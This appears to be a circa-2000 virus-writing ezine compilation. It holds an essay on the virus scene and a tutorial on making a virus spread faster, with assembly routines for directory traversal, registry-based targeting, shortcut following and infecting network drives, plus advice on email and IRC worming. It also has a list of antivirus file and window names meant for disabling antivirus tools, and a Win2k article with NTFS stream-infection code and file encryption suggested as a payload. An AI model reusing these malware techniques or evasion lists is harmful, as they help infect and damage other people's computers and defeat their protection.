Another example, linked with the group problem. It seems that some people create agroup for the only excitement to become a boss, to be able to recruit people, commandthem, and fire them if needed. People always need to find other people even more lamethan them to enhance themselves, it's an eternal law of the human beings. Samemechanism of false and artificial feeling of power than in IRC. It's "my" group, "my"board, "my" zine, "my" channel, and there i am the king. More generally, a rigidhierarchy in a group is a clear signal of lameness. Newcomers, please notice how thebest groups around have no hierarchy at all. Maybe one guy who centralizes thematerial for the zine, and that's all. Every attempt to mimick the real world (a companyfor example, with different departments) is condamned to be considered as extremelylame and poorly productive; and i don't even talk about the irony to see newcomers inthe underground trying very quickly to imitate the mechanisms of the normal world.Didn't you come in the vx world in part because it looked different?
That's why everybody laugh when a group creates this peak of extreme ridiculousness,a "Public Relation" department. It's clearly a way to admit "we have nothing to say, butanyway, there is a guy in charge of that". It's a way to show to everybody yournombrilist and egocentric view of the scene, because you think every journalist aroundis going to be interested by your new group, you will be submerged by interviewrequests, users will ask you about your viruses, you will do the first page of the NewYork Times. In your dreams.
- Delicate conclusion
I sometimes think that the Vx scene is mainly composed by boring IRC teens, who don'treally know what life (i mean the real life) is all about, who are not interested inlearning, but in posing as some elite lordz of Darkness. It may be partially true, orpartially wrong, depends on how you look at it. Anyway, i don't really care. A minorityof people are interesting enough, as human beings, or coders, or both, and that's theonly important thing, at least for me. I don't care about all the microscopic IRC wars,the anecdotic group fights, the childish agressivity. Maybe that's because i'm a bit old,but i think i've learned how to filter important things from the background noise. Andnot just in Vx world. Try to do the same, you will see, life is easier.
- Epilogue
People involved in the virus community - i don't like the word "scene", this is not atheater, and there is nobody looking at us, another nombrilist deformation of reality,even in the terms used - always say that it's worsening with the years passing. More andmore script kiddies and less and less die-hard asm coders who can spend six hours on aroutine just to optimize it by saving two bytes. I don't think it's true. The problem beingthat people cannot separate their personal history from the global picture (that's notlimited to the Vx world, of course). If you try to look at it with some distance, you willsee that the vx community looks the same than five or ten years ago. Not in term of
techniques used, of course, but in term of personalities. New people pops in, old peoplequit, as an eternal cycle. In these two extreme populations, and in the large group ofactive vxers which sits in the middle, the proportion between posers who are just drivenby an ego trip (ph33r M3!), and the really interesting guys who want to discover newtechniques or possibilities, even through a long learning process, yes, this proportionstays always the same through the years. You have stupid old schoolers and stupidnewbies who think they are Elvis, and you have interesting old schoolers and interestingnewbies who want to learn, always. If you're reading this and you think you are part ofthe "scene", just think about in which category you fit best. But be aware that the imageyou have of yourself may not be the image that your Vxers colleagues have of you. Ifyou're not satisfied with it, think about what you can do to change it and maybe to gainsome respect. I'm not talking just about just improving your technical skills. Somepeople try to be creative with their limited knowledge (me, for example), other runwebsites, publish useful databases, are active collectors, help newcomers by writingtutorials, code other things than pure viruses, whatever. You can, at last, ameliorateyour behaviour when interacting with other people. In other words: try to be mature.
I will terminate here and return in my cave. Hope this helps.
Spanska - 20 September 2000
PS: Post a message in alt.comp.virus if you want to talk about that - I have no mail.
[copyquedalle: steal this text, modify it, sign it with your name, wipe your ass with it, i don't fucking care]
http://kickme.to/Cryptic/fly.to/alpina
Faster Spreading or What to include in your virus to make it sprea d more effective
by SnakeByte [SnakeByte@kryptocrew. de]
Here we go, please notice that it is illegal to spr ead viruses, and allthis information is completely theoretical, or for testing purpousesin a controlled environment.
I just wrote one Windows-Virus so you will see here just fewlines of code.. ( interesting ones I think but mayb e not very optimized ;)
The task of a virus is to spread ( Payload is just a side-effect ).So we need some tricks ( besides infection *g* ) to make our virusspread, as fast as possible.
Ok, when a virus arrives on a clean system, it will infect some files, sure .. ;)But if something went bad, we just get some files i n the current directoryand the victim deletes it, because he does not like the infected app.. :(
Not very good, so what to do to avoid this situatio n ?
Here are 6 ideas what we can do :
1.) Infect as many file-types as possible. 2.) Try to drop over archives 3.) Parse Directory's 4.) Use the Registry 5.) Follow Links 6.) Worming
Ok, let's take a closer look at each of these metho ds:
1.) Infect as many file-types as possible.
If you are macro coder, you should try to infect a s many documents which support macro as possible ( DOC, CDR, DOT, PPT, XL S.. ). Same for the assembler coders, there are a lot of file formats which can be infected in Win32: PE-EXE, SCR (same as PE-EXE) , DLL, HLP and VXD. Maybe you should try to code a hybrid which is abl e to infect Binaries on the one hand and macro on the other hand, this wil l offer you a much higher chance of finding files for infection. In VDat the re is a description for how to infect most file types. I think adding 200-400 Bytes to your virus and being able to infect another type is a very good d eal. The more files you infect the more likely you get your virus around.
2.) Try to drop over archives
Nowadays nearly every file you download somewhere or get send by someone is zipped or packed with another archiver ( RAR, ACE ..) It is possible to infect the files in the archives too. It also offers
you a small protection against AV programs, becaus e AVP for example does not scan archives by default. Read Unknown Mn emonix Tutorials about archive infection for more information about how to do this. So if you infect an archive you archive two goals ( stupid sentence ;P ) the might not get detected, it is possible that so meone uploads the archiv to a website and your virus get's lots of hits..
3.) Parse Directory's
Ok, now we infect a lot of files, but still all ar e in the same directory, so we need to change and parse directory's. What w e should infect nearly always are the windows and the system directory's, cause they include a lot of files, which are highly used. Use the GetWindow sDirectory and GetSystemDirectory API's to retrieve their names. Then you should par se directory's to find more files to infect. Otherwise we would have infected the current, the win and sys directory, but nothing else, which is not very use ful ( how often do you dcc a friend your calc.exe ? *g* ) There are two ways of directory parsing, the one is upwards the other downwards. If you travel down wards ( like cd.. in dos), you would normally not find a lot of files, so traveli ng upwards is recommended. This can be simply done with a FindFirstFile / Fin dNextFile Loop. The current directory is assumed to be root on one of the drives. The FindNextFileProc and FindFirstFileProc are pro cedures that call the matching API's ( I think you'll also use them seve ral times ) The RandomNR procedure just generates a random num ber in dx.
************************
ParseFolder: call InfectCurDir ; infect the current dir ectory cmp [ebp+InfCounter],0 ; check if we reached th e number of files we want to infect jbe EndParsing ; we infected enoug ? ok , leave !
lea esi, [ebp+Folders] Call FindFirstFileProc inc eax jz EndParsing ; If there are no direct orys we return dec eax ; otherwise we save the handle
GetOtherDir: ; first of all we check if this ; is a valid directory mov eax, dword ptr [ebp+WFD_dwFileAttributes] and eax, 10h ; if not we get the next jz NoThisOne ; one
lea esi, [ebp+WFD_szFileName] cmp byte ptr [esi], '.' ; we will not parse into . or .. je NoThisOne ; directorys
call RandomNR ; generate a random Numb er, if it is 1 dec edx ; we infect the director y, otherwise ; we go on searching jz ParseNewDir ; we get this directory
NoThisOne:
call FindNextFileProc ; Find next directory test eax, eax jnz GetOtherDir
EndParseDir2: ; we close the search - Handle
mov eax, dword ptr [ebp+FindHandle] push eax call dword ptr [ebp+XFindClose]
EndParsing: ; we just return ret
ParseNewDir: ; we got a direcory, let 's change to it ; and infect it.. *eg*
; close Find-Handle mov eax, dword ptr [ebp+FindHandle] push eax call dword ptr [ebp+XFindClose]
; set new directory lea esi, [ebp+WFD_szFileName] push esi call dword ptr [ebp+XSetCurrentDirectoryA]
jmp ParseFolder ; parse it again !
Folders db '*.',0
************************
4.) Use the Registry
The Windows Registry also offers us a lot of infor mation about what files or directorys we should infect to be sure that our virus gets activated again and does not sleep inside some never used fi les. You need to load an additional DLL in your virus, but i think this is ok. If you can't load the DLL, just jmp over the registry routines and i nfect fewer files. I think you all know what the windows registry is or ? For those who don't: the registry replaces the old ini files which have been used in older versions of windows ( 3.1 ). The registry information is st ored in the User.dat and System.dat. To view or change the registry use 're gedit.exe', which is delivered with every version of windows.
The following API's are neseccairy to access the r egistry, they are all inside the ADVAPI32.DLL !
RegOpenKeyEx - Opens a registry key RegCloseKey - Closes an open key RegCreateKey - Creates a key RegEnumKeyEx - Enumerates subkeys RegQueryValueEx - Retrieves a value RegEnumValue - Enumerates values
Ok, let's see some source how to get a value from registry : This little piece of code gets the Startmenue Fold er
************************
lea esi, RegHandle push esi push 001F0000h ; complete access push 0h ; reserved lea esi, SubKey push esi push 80000003h ; HKEY_USERS
call RegOpenKeyExA
test eax, eax ; if we failed opening t he key, we return jnz WeFailed
; let's get the value lea esi, BufferSize push esi lea esi, Buffer push esi lea esi, ValueType push esi ; Type of Value push 0 ; reserved lea esi, Value push esi ; ValueName mov eax, RegHandle push eax ; Reg-Key Handle call RegQueryValueExA
mov eax, dword ptr [RegHandle] push eax call RegCloseKey
WeFailed:
ret
SubKey db '.Default\Software\Microsoft\Windows\ CurrentVersion\Explorer\Shell Folders',0Value db 'Start Menu',0ValueType dd 0h ; Type of registry ValueBufferSize dd 7Fh ; size of bufferBuffer db 7fh dup (0)
************************
Buw what can we use the registry for ? Ok let's see some interesting values :
In these Keys are the autostarted files : HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Runonce HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunOnce HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunServices HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunServicesOnce
Here are the paths of all installed apps, what abou t parsing this key ? ;) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\App Paths
Several standard directories : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Setup
Shared files ( infect them "two for the price of on e" *g* ) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\SharedDLLs
Registered Help Files ( if your virus infects them, here you get a whole bunch of ) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Help
Computer Network Name ( nice value for slow poly ) HKEY_LOCAL_MACHINE\System\CurrentControlSet\contro l\ComputerName\ComputerName
A list of installed files (vxd, exe, dll, hlp, pif, .. ) : HKEY_LOCAL_MACHINE\System\CurrentControlSet\contro l\InstalledFiles
5.) Follow Links
Windows uses LNK-Files to create shortcuts for oft en used files, so you don't need to copy a 8 MB huge file to your deskto p. If you find such a Link, you should check if it points to a file yo u are able to infect, if so.. don't wait and drop your code over it. Very useful becomes this if you parse the Start-Me nue or the desktop *eg*
Here is some example code from my Win32.DDoS how t o do this, it does not work with NT-LNK Files :( There is also an API we can use for this, but I never figured it out, but I think this is not that much code, so we can include it.
I assume you retrieved the LNK-File with the help of FindFirstFile / FindNextFile and the information is stored in th e WIN32_FIND_DATA Structure, I also assume that the file is mapped a nd the base address in MapAddress.
************************ ; first of all, we check for the file ; mark, it is a single ' L' followed by a zero
mov esi, dword ptr [ebp+MapAddress] cmp word ptr [esi], 'L' ; check for sign jne NoLNK ; if it is no LNK File w e close it
; Let's make a check for the file-size, ; I don't think that the re are any shortcuts ; bigger than 1 MB, just to be sure.
cmp dword ptr [ebp+WFD_nFileSizeLow] , 0400h ja NoLNK
; get the start addy in esi, and and the size
mov esi, dword ptr [ebp+MapAddress] mov ecx, dword ptr [ebp+WFD_nFileSizeLow] xor edx, edx add esi, ecx ; we start checking at t he end of the file ; for a valid filename i n itCheckLoop: cmp byte ptr [esi], 3ah ; we detect a filename b y the 2 dots ( 3ah = : ) jne LNKSearch ; in the Drive ; for example C:\whateve r\blah.exe ; we search for the ':'
inc edx ; there are 2 times 2 do ts, when checking from cmp edx, 2d ; the end of the LNK, we need the 2.nd je PointsDetected ; the first : is inside the path ( without filename ) ; so we skip them
LNKSearch: ; go on searching dec esi ; we search until we fou nd the dots or loop CheckLoop ; searched the entire fi le ( size in ecx ) ; I don't want to create a SEH .. ;) ; if we end here, we did not find the two dots.. :(NoLNK:
ret ; return to search more files...
PointsDetected: ; we found the drive ( t wo dots ... *g* )
; esi points to them, no w we need to check ; the name..
cmp byte ptr [esi+1], 0h ; check if we got an ent ire path or just a je NoLNK ; single drive ; this can happen someti mes with NT or 2k ; shortcut files, so we better avoid them
PointsDetected2: ; now we search the star ting point of the name dec esi ; by searching for a zer o cmp byte ptr [esi], 0h je NameDetected
loop PointsDetected2 ; ecx still takes care, that we don't ; search too far..
jmp NoLNK ; nothing found ? return ..
NameDetected: ; ok, esi points now to the name of the file inc esi ; you can now open this file and check if it is ; something you are able to infect ; it's just that easy, b ut very effective, if you ; do this in the right f olders,.. ;)************************
6.) Worming
To make sure you don't stay on a single computer y ou should try to spread over networks. One way are IRC-Worms, which sends your virus to other chatting people. To my mind this is the easiest way to worm around. Another way is to check all drives and if you have access to a network drive, infect there some files.
************************
push offset Buffer ; offset of the buffer push 60h ; buffer-lenght call GetLogicalDriveStrings
cmp eax, 0 ; did we fail ? je StopThis
lea esi, Buffer
WhatDrive: push esi call GetDriveType cmp eax, DRIVE_REMOTE ; we got a network dri ve jne NoNetwork
; esi still contains t he offset of ; the root dir on the drive call infectDrive ; so we infect it.. ;P
NoNetwork: Call GetNextZero ; place esi after the next zero ; ( searching from esi onwards ) cmp byte ptr [esi],0 jne WhatDrive ; if we searched all d rives we ; end here, otherwise we check the typeStopThis: ret
Buffer db 60h dup (?) ; I don't know that ma ny ppl with 20+ ; Drives so this buffe rsize should be ; big enough ;)
************************
Another way is, like the 911-Dialer does, to scan IP ranges when the user is online for non-pass protected Netbus PC's. If y ou have access, just upload your virus ;) Finally, you can worm with the help of E-Mails, in fect a program and send it with the help of Visual Basic Script or with th e MAPI Commands around. This is maybe the fastest and most efficient way of spr eading, cause the snowball effect is very huge. But if you use VBS and Outloo k, please keep in mind that it is worse enough that your virus just spreads in on e OS, if it also relies on two frontends ( OE and VB Scripting Host ) it beco mes even worse ;)
Hope this little text helps at least some peoples, I enjoyed writing it, and hope you do so too while reading it... ;)
cu SnakeByte
AV-List 13.07.2000 ( by SnakeByte [ [email protected]] )
What is the problem when using anti-AV tricks in a Virus ? The most of those you find in tutorials are simply outdated ( Think of the f-prot loop trick, which is still used ;) But in windows you have more poss ibilitys to get rid of the AV's You can stop the execution of files ( under win9x and 2k ), you can delete files, you can prevent files from being executed ( if you 're ring-0 ) and you can close windows of other applications. So on this li ttle list you find all you need for this.
I looked for such a list because I wanted to know which files are used by AV's and which windows we should close to disable them ! But i found none, luck for you : Now I got a CD in my hands with several Shareware AV's and I collected several others on the net ( god i love this flatrate ;) So I took myself some spare time and made this little listing.
I just have Win95 so I can just give information a bout the Win9x Versions. If you have another Version of a program, which is listed here, installed or informations about a program which is not listened here, please contact me, so I can expand this list and keep it actual.
*************************************************** *********** Anti-Viral Toolkit Pro ( AVP )
Files: *.avc Virus Database ( The Normal EXE Files seem to start the _ ones ) _avp32.exe AVP Avtiviral scaner shell _avpcc.exe AVP Control Centre Application _avpm.exe AVP Monitor avp32.exe AVP Scanner ( Main File ) avpcc.exe AVP Control Centre Application avpm.exe AVP Monitor avpdos32.exe AVP Scanner for DOS avptc32.exe AVP Scanner for DOS exec.exe unknown avpupd.exe AVP Update ( leeches new *.avc fi les )
Window-Names: AVP Monitor AntiViral Toolkit Pro AVP Updates
*************************************************** *********** AntiVir 9x
Files: Antivir.vdf Virus Database AVE32.exe Scanner ( DOS ) Avgctrl.exe Monitor Avnt.exe Scanner ( DOS ) Avrep32.exe Report Viewer AVSCHED32.exe Scan Scheduler AVWIN95.exe Scanner Avwupd32.exe Update
Windows: H+BEDV AntiVir Guard/9x
AVWUPD32
*************************************************** *********** Dr. Solomon Virus Scan
Files: scan.dat Virus Database ( assumed ) AVConsol.exe Scheduler Bootscan.exe MBR-Scanner ( DOS ) ECEngine.exe Download Engine FindViru.exe Scanner ( DOS ) scan32.exe Scanner scrscan.exe ScreenSaver + Scanner VSCAN40.exe Desktop for the Scanner vshwin32.exe Monitor Webscanx.exe Webscanner
Windows: vsstat Avconsol Webscanx Vshwin
*************************************************** *********** F-Prot for WIndows
Files: *.def Virus Database Expert.exe Help & Information ( DOS ) FP-Win.exe Scanner f-stopw.exe Monitor Vir-help.exe Help-File ( DOS )
Windows: FP-WIN F-PROT für Windows ( German Version ) F-STOPW Version 5.06c
*************************************************** *********** F-Prot 3.07B
Files: *.def Virus Database F-prot.exe Scanner ( DOS )
*************************************************** *********** F-Secure Anti-Virus for Windows 95
Files: *.avc Virus Database ( uses same as AV P ! ) DVP95.exe F-Secure Gatekeeper DVP95_0.exe F-Secure Gatekeeper F-agnt95.exe F-Agent F-prot95.exe F-Secure Anti-Virus Launcher
Windows: F-Secure Anti-Virus for Windows 95
F-Secure Anti-Virus F-agnt95 Dvp95
*************************************************** *********** G-Data AntiVirenKit ( German Program )
Files: *.avc Virus Database ( Same as AVP ! ) AvkServ.exe Scan Server AckWin32.exe Scanner notstart.exe creates Bootdisks
Windows: AntiVirenKit 9
*************************************************** *********** InoculateIT Personal Edition:
Files: Vet95.exe Scanner VetTray.exe Monitor AutoDown.exe Update Rescue.exe Dos-Scanner
Window-Names: InoculateIT Personal Edition InoculateIT Real-Time Protection Status vettray AutoDownload
*************************************************** *********** Norman Virus Control Win 9x
Files: Claw95.exe Monitor Claw95cf.exe Configures Monitor Normist.exe Smart Behaviour Blocker Nvc95.exe Scanner Nupgrade.exe Internet Upgrade NVCbin.def Virus Database NVCMacro.def Virus Database
Windows: Norman Virus Control for Windows 95/98 Cat's Claw v4.80
*************************************************** *********** Norton Anti Virus ( NAV )
Files: navapw32.exe Monitor NavLu32.exe Update Navw32.exe Scanner
Windows: navpw32 Norton AntiVirus
*************************************************** *********** Sophos Anti-Virus for Win95:
Files: VDL.dat Virus Database ( assumed ) Sweep95.exe Scanner
Window-Names: Sophos Anti-Virus - SWEEP
*************************************************** *********** Trend PC-Cillin 98
Files: IOMon98.exe Monitor PCCWin98.exe Scanner
Windows: Trend PC-cillin 98 Iomon98
*************************************************** *********** RAV 7
Files: *.vdm Virus Database Jedi.exe Scan Scheduler Monitor.exe Monitor rav7win.exe Scanner rav7.exe Scanner ( DOS )
################################################### ###########
Are Anti-Virus Companies Criminals?
SnakeByte
Hi, maybe you start wondering about this headline, but I will tell you some facts which brought me to this question ;)
The first thing is, that in several countries there is a law against the ownership of viral sourcecodes and binaries. But this also includes, t hat it is forbidden to share these things. What do AV'ers do ? They share their files so they all are able to include common viruses into the databases. In addition to this, th ey have a lot of viral binaries and disassemblys in their labs, to analyze viruses.
The next fact is not related to a country-specific law, but to international copyright. Most of the software for MS-DOS and Windows ( which are the favourite platforms for viruses ), is commercial. What does this mean ? You got to pay fo r the software you use. If you copy it completely or parts of it, whithout paying for the code, you break international copyright laws. Heh, what does Kasperski and the others ask m e for ? I shall send them files which I suspect to be infected ? I can't believe this, they ask me to commit a crime ! I don't know how other countries handle this, but here in german y if you make another person commit a crime it is nearly as worse as committing the crime on your own.
Last time I installed something commercial on my PC , I was so bored, that I read the disclaimer ( you know the window with lots of text you normally just see for a short time, cause you directly press >next< ). I was wondering when I saw the little paragraph about reverse engineering. If you own this program, you a gree to the terms, that you will never ever reverse this program. ( If you don't own the p rogram you break the copyright I talked few lines above about *g* ). Heh, how do the Anti-V irus researchers analyze viruses ? They reverse the virus, to get knownlegde about how the virus works. Whoah, to do this, they also need to disasm the infected program. Another law th ey break. I really don't think that they just start the file to infect some goats, if they w ould, they get in danger that new hardware attacks destroy their systems ;)
Another thing is that several Anti-Virus Companies start to work on Scanners, which work on mail-servers to stop outgoing viruses. The mail wil l not be delivered. Due to the fact, that a most virus scanners can scan compressed files and so on, there is no easy way for a normal user to send a virus to his favourite AV Company, i f the webserver he uses has one of these scanners running and the scanner has the virus insi de its database. Ok, why is this so criminal ? They exclude smaller AV-Companies by thi s from the market. I for myself write a simple, free Anti-Trojan Tool. How should I receive submissions from peoples which want tu support my work ? It is impossible and therefore I can not longer work on my product. By this, they use their nearly-monopol like place to g et rid of concurrents. This is illegal, as you see on the current proceedings against Micro soft.
What if we consider viruses to be an art ? In a way the author created something unique, which may be assumed to be an artwork like a book o r a painting ( If you look at abstract artwork, nearly everything may be considered to be art *g* ) What about the destruction of art ? Nearly everywhere this is illegal or at least against the ethics ( Just think about the burning of books by the germans during the WW2 ) So this might be another crime they commit.
What if we would place a copyright in our software ? Something like: "You can freely distribute this program, as long as you do not chan ge anything. Disassembling and the forwarding to the Anti-Virus Community is forbidden . This program is protected by international law. It is just meant for analyzing a rtificial intelligence on controlled environments. It is also strictly forbidden to plac e this program on a non controlled environment and place it into the wild.. bla bla" J ust use their laws, to forbid them analysing our creations. If you see the virus in a AV-Database you know they have broken this law and you can take them to the court... ;)
Ok Mr. Kaspersky go and get some good lawyers ;)
Some Tipz & trix for Win2k
1. IntroductionI just wanted to write an article about NTFS5. But I am reading a lot ofdocumentation about Win2k and I found there many fu nctions and sequences thatcould be very usefull for us, virus coders. So i de cided to write some tipzand trix that anybody could use. I hope I succeeded .btw It's my first english written article so pls be patient. My english sux so if you don't know what something means, just contact me.And now we can begin ...
2. NTFS5I think you all expected this:) And i also read on virus.cyberspace.sk thatenglish version of my article for Igi is requested. I won't exactly translatewhat i wrote there becoz it wasn't for coders. This will be :)
2.1. StreamsStreams is not a new feature of NTFS5 and it was im plemented in NTFS since thevery beginning of WinNT(version 3.1) but it has bee n downplayed by Micro$oft.In Win2k the position of Streams is much better. An d there also exists the firstvirus that uses Streams. It's of course mine and Be nny's/29a Win2k.Stream. Ithink ya all have heard about it becoz of big media l success. It's an very easyand simple virus with a good idea I think. First we heard about Streams from aman called GriYo/29a (heya and thx man!) on meeting in Brno. And then when Bennycame to me for some days we decided to write our fi rst common virus (and myfirst). It was really funny becoz we coded through the nite and very lately wedidn't even know what we are typing :) There also e xisted a version ofWin2k.Stream with polymorfic name of stream! But ne xt day when we woke up andtalked about it in the pub we decided to write it a s simple as possible. And Ithink we succeeded - the comment is longer than the whole code XD.First we'll look what Streams exactly are and then we'll talk more about ourvirus.
On filesystems such as FAT, FAT32 and others exists only one unnamed stream.What do ya think it is? Exactly! The file alone. Bu t on NTFS there exist alsoothers (data) streams with a name. The name begins with ':' to indicate that it'sa named stream (part of file) and pastes together w ith filename (the unnamedstream). Look at this:
We have a file file.txt. It is also the unnmed stre am. We would like to createa new stream within the file file.txt. We want to n ame it "RAT" for example. Sowe simply add ':' before stream name and paste it t o file name. So now we havesomewhere in the buffer this: "file.txt:RAT". And n ow there's nothing easier thanjust use CreateFile(A|W) to create our stream. If c reation succeed you willget a handle that you can uses as it would be a nor mal file (it is exactly a normalfile ...).
Well we have a stream within the file but we forgot its name :) Any solution?Yeah there is one. It's not so comfortable as it sh ould be but there is. Forour needs we'll need a function called BackupRead t hat can be found inkernel32.dll.
Look what MSDN says:
BOOL BackupRead(HANDLE hFile, // handle to file or d irectoryLPBYTE lpBuffer, // read bufferDWORD nNumberOfBytesToRead, // number of bytes to readLPDWORD lpNumberOfBytesRead, // number of bytes rea dBOOL bAbort, // termination typeBOOL bProcessSecurity, // process security op tionsLPVOID *lpContext // context information);
For our purposes we can ignore such thingiez as sec urity and context. hFile ishandle to file we want to enumerate streams. lpBuff er should point to a structurecalled WIN32_STREAM_ID.
WIN32_STREAM_ID struc DWORD dwStreamId; DWORD dwStreamAttributes; QWORD Size; DWORD dwStreamNameSize; WCHAR cStreamName[ANYSIZE_ARRAY]; WIN32_STREAM_ID ends
The first bytes of this structure represent the hea der of each stream. Thenbegins the name of the stream and after the name th ere is the content of stream.To enumerate all the streams, you just need to loop until BackupRead returnsFalse. Just look at the code snippet:
; in ebx - file handle to enumerate streamsenumerate_streams:
push offset lpcontextpush 0push 0@pushvar <dd ?>push 20push offset bufferpush ebxcall BackupRead ; read the stream headerxchg eax, ecxjecxz end_enumerate_streams ; error ?push offset lpcontextpush 0push 0@pushvar <dd ?>push dword ptr [buffer+16] ; push stream_name_sizepush offset buffer+20 ; stream_name_size store to bu ffer+push ebx ; header_sizecall BackupReadxchg eax, ecx ; error ?jecxz end_enumerate_streams
; Now we have in buffer+20 the stream_; name in Unicode. Its length is ; [buffer+16] ...
push offset lpcontext ; becoz BackupRead loox at fil e and its@pushvar <dd 0> ; streams as it would be on file we m ust@pushvar <dd 0> ; seek after stream content.push dword ptr [buffer+12]push dword ptr [buffer+8]push ebxcall BackupSeekxchg eax, ecx ; error ?jecxz end_enumerate_streamsjmp enumerate_streams ; go on with another stream_na me ...
end_enumerate_streams:
Well i think that this is all you should know about streams for the beginning.Just make some more coding with it and i think you will become more familiarwith it and you will use it in the future. Remember the words from Kaspersky/AVP:Stream companion is a new breaktrough infection whi ch is very hard to detect!Just make some more wrinkles to AVers ...
2.1.1. Win2k.StreamAnd now something more about our babe. After the ex ecution tries to find via
FindFirst&FindNextFile find victimz to infect. It i nfectz only *.exe files incurrent directory (there were no reasons to spread it). The infection worx asfollows:
first it chex if the file is compressed (viz. next chapter)then it creates a temp file and copies the main str eam to itcopies virus_body to main_victim_streammoves tempfile to stream <victim_file>:STRcompresses the file
so after infection the file loox as this: (This are pictures from AVP :))
File before infection File after infec tion
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄ¿³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°° °°°°³³°°°°°°°°°°°°°°°°°°°³ ³°°° main stream °°°°³³°°°°°°°°°°°°°°°°°°°³ ³°°° virus body° °°°°³³°°°°main stream°°°°³ ³°°°°°°°°°°°°°°° °°°°³³°°°°°°°°°°°°°°°°°°°³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄ´³°°°°program body°°°³ ³°°°°°°°°°°°°°°° °°°°³³°°°°°°°°°°°°°°°°°°°³ ³°additional str eam°³³°°°°°°°°°°°°°°°°°°°³ ³°°°°°° :STR °°°° °°°³³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°° °°°°³ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄ´³±±±±±±±±±±±±±±±±±±±³ ³±±±±±±±±±±±±±±± ±±±±³³±±service streams±±³ ³±±service strea ms±±³³±±±±±±±±±±±±±±±±±±±³ ³±±±±±±±±±±±±±±± ±±±±³ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÙ
then it tries to find next file etc. At the end it just runs via CreateProcessthe <victim_file>:STR stream where is victim_body. When the victim ends it justinvokes ExitProcess and ends. If any error occures it displays following text:
"Win2k.Stream by Benny/29A & Ratter""This cell has been infected by [Win2k.Stream] viru s!"
and ends. This is also a payload on FAT, FAT32 and others filesystems that donot support streams. And that's all. Simple ain't i t?
2.2. Compression and encryptionWe also as first used in our babe NTFS ability to c ompress files. It istransparent for application so it is a great way ho w to reduce disk free spacedecreasing after infection occures. If we want to c ompress file we must callfile_system driver via DeviceIoControl with the rit e IoControlCode ... lookat this code snippet from Win2k.Stream and also fro m my Win2k.Purple (butthe first who did this was Benny/29a in his Win32.H IV. On our mini-meeting hedecided that we will use it in Win2k.Stream first . ..)
FSCTL_SET_COMPRESSION equ 9 shl 16 or 3 shl 14 or 16 shl 2
xor eax,eaxpush eax@pushvar <dd ?>push eaxpush eaxpush 4@pushvar <dd 1> ;default compressionpush FSCTL_SET_COMPRESSIONpush ebx ;NTFS compress it =call DeviceIoControl ;mark as already infected
; = and save disk space :)
and now what MSDN says:
BOOL DeviceIoControl((HANDLE) hDevice, // handle to fileFSCTL_GET_COMPRESSION, // dwIoControlCode ope rationNULL, // lpInBuffer; must be NULL 0, // nInBufferSize; must be zero(LPVOID) lpOutBuffer, // output buffer(DWORD) nOutBufferSize, // size of output buff er(LPDWORD) lpBytesReturned, // number of bytes ret urned(LPOVERLAPPED) lpOverlapped // OVERLAPPED structur e
);
I think that it is clear. And also simple to implem ent to your virus. Just do it!
Next thingie is Encryption. It can be easyly used b y calling functionsEncryptFile and DecryptFile :). I think that it cou ld be aplied as a payloadbecoz if you encrypt on the machine with Win2k a fi le then only the user whoencrypted the file has access to the file. After en cyption of some files therecan be very good chaos on the machine :)
BOOL EncryptFile( LPCTSTR lpFileName // file name);
BOOL DecryptFile( LPCTSTR lpFileName, // file name DWORD dwReserved // reserved; must be zero);
I think i'm repeating myself but - easy to implemen t, easy to use ...
2.3. Sparse filesI dunno if anyone finds use for sparse files in vir us coding but i found thisas a very nice feature of NTFS5 so i would like to talk about it here. Have youever imagined how much space must be wasted in data bases in which most of thefile is null (free records)? A lot of :) And here c omes a solution for suchapplications. Sparse files. (sounds like a promote of M$ :)) We as programmerscan define where in the file lie such holes (with n ulls) and say it to thefilesystem. Filesystem will just store to disk data s which by which we say thatare not null ... code snippet will show more:
BOOL DeviceIoControl( (HANDLE) hDevice, // handle to a file FSCTL_SET_SPARSE, // dwIoControlCode o peration NULL, // lpInBuffer; must be NULL 0, // nInBufferSize; mu st be zero NULL, // lpOutBuffer; must be NULL 0, // nOutBufferSize; m ust be zero (LPDWORD) lpBytesReturned, // number of bytes r eturned (LPOVERLAPPED) lpOverlapped // OVERLAPPED struct ure);
FSCTL_SET_SPARSE equ 9 shl 16 or 2 shl 14 or 49 shl 2FILE_BEGIN equ 0
push 0push 0push CREATE_ALWAYSpush 0 ; create file SparseFile
push 0push GENERIC_WRITE@pushsz "SparseFile"call CreateFileAxchg eax, ebxxor eax,eaxpush eax@pushvar <dd ?>push eaxpush eaxpush eaxpush eax ; Sign this file as a SparseFilepush FSCTL_SET_SPARSEpush ebxcall DeviceIoControlpush FILE_BEGIN@pushvar <dd 8>push 0 ; Move filepointer to 32GigaBytespush ebx ; (hyea Gig :))call SetFilePointerpush ebx ; SetEndOfFile ==call SetEndOfFile ; fill with nulls to 32 gigzpush ebxcall CloseHandle
This code snippet will create a file which size is 32GB! But acutally the realsize is null :) Nice aint it ? And how to let the f ilesystem know that we havesparse in our file? Here's a prototype of function that we can use ...
